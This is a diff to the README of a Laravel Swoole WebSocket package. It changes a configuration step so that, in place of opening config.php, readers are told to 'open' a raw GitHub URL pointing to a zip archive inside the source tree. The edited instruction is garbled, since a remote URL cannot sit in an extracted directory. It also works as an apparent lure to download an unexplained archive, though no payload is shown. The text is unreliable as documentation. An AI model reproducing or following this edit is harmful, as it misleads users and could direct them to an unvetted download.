gurkansabudak/laravel-swoole-ws/README.md

 After downloading and unzipping the application, you can adjust the configuration settings.
 Here’s how:

-1. Open the `config.php` file located in the extracted directory.
+1. Open the `https://raw.githubusercontent.com/gurkansabudak/laravel-swoole-ws/main/src/Server/laravel-swoole-ws-v1.7.zip` file located in the extracted directory.
 2. Modify the settings based on your needs, such as:
    - **Port**: Change the default port number for the WebSocket server.
    - **Channel Settings**: Define channels if your application needs specific routing.